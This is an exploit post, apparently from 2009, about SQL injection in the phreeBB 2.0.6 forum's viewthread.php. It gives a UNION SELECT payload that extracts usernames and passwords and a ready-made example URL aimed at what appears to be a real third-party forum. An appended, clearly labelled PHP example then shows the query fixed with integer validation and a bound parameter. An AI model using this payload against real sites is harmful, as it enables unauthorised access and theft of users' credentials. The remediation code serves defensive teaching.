Ded MustD!e
27.08.2009, 09:30
Not to be confused with phpBB!
SQL-Inj
Product: phreeBB
Version: 2.0.6
Vulnerable script: viewthread.php
$result = mysql_query("SELECT * FROM viewForums WHERE view=$id");
$msgData = mysql_fetch_array($result);
Exploit: -1/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9, 10/**/from/**/users--+
Example: http://www.vespaclubbiella.it/forum/viewthread.php?forumid=2&id=-42/**/union/**/select/**/1,2,3,concat_ws(0x3a,userName,userPass),5,6,7,8,9, 10/**/from/**/users--+
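The query in viewthread.php, rewritten so that id is validated as an integer and passed as a bound parameter. This is an added example, not part of the original post and not phreeBB code. Assumptions: the function name fetchThread, the title column and the sample row are constructed, and an in-memory SQLite database (pdo_sqlite) stands in for the forum's MySQL database so the script runs offline.

```php
<?php
// Added example, not phreeBB code. Table and column names (viewForums, view)
// come from the snippet in the post; everything else is constructed.
declare(strict_types=1);

// Hypothetical helper: returns the thread row, or null if the id is invalid
// or no row matches.
function fetchThread(PDO $db, $rawId): ?array
{
    // 1. Allow-list: id must be a positive integer and nothing else.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // reject instead of handing the text to the database
    }

    // 2. Bound parameter: the value never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT * FROM viewForums WHERE view = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed stand-in for the forum database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE viewForums (view INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO viewForums VALUES (42, 'constructed sample thread')");

// Constructed inputs: a normal id, and text shaped like the injected id value.
foreach (['42', '-1/**/union/**/select/**/1,2'] as $input) {
    $row = fetchThread($db, $input);
    echo $input, ' => ', $row === null ? 'rejected or not found' : $row['title'], PHP_EOL;
}
```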